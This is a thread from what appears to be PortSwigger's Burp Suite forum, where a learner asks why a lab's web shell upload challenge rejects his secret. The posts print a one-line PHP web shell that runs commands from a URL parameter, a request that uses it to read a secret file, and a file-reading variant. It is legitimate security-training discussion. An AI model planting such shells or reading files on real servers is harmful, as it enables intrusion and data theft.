Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Remote code execution via web shell upload, it's not taking the correct solution.

Rob | Last updated: May 09, 2024 04:13PM UTC

Can someone on staff look at this challenge? I have the secret key but when I copy and paste it into the submission box its says it's wrong. I could post the key here or what URL string I used to get it if needed, but I don't want to spoil anything.

Rob | Last updated: May 09, 2024 04:19PM UTC

This is an Academy challenge

Ben, PortSwigger Agent | Last updated: May 09, 2024 04:30PM UTC

Hi Rob, The secret will be unique to each lab instance so you can certainly provide us with the details here without spoiling anyone else's lab experience. Would you also be able to provide us with details of what the content of your exploit looks like?

Rob | Last updated: May 09, 2024 04:43PM UTC

https://0a5800ed04623057813684ce00410038.web-security-academy.net/my-account https://0a5800ed04623057813684ce00410038.web-security-academy.net/files/avatars/small1.php?command=cat%20/home/carlos/secret El06ncde84gVIWFwTaRYpJ0zMyo3VSVMEl06ncde84gVIWFwTaRYpJ0zMyo3VSVM the small1.php is just: <?php echo system($_GET['command']); ?> I entered in the above secret and it doesn't take it.

Ben, PortSwigger Agent | Last updated: May 10, 2024 07:55AM UTC

Hi Rob, That exploit will print the secret out twice - if you note the secret in this lab instance is actually 'El06ncde84gVIWFwTaRYpJ0zMyo3VSVM' and this is repeated twice in your output. If, instead, you use something like: <?php echo file_get_contents('/home/carlos/secret'); ?> Then this should only return the secret value once.

Rob | Last updated: May 10, 2024 01:08PM UTC

Oh, i see, i didn't even notice, thanks

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.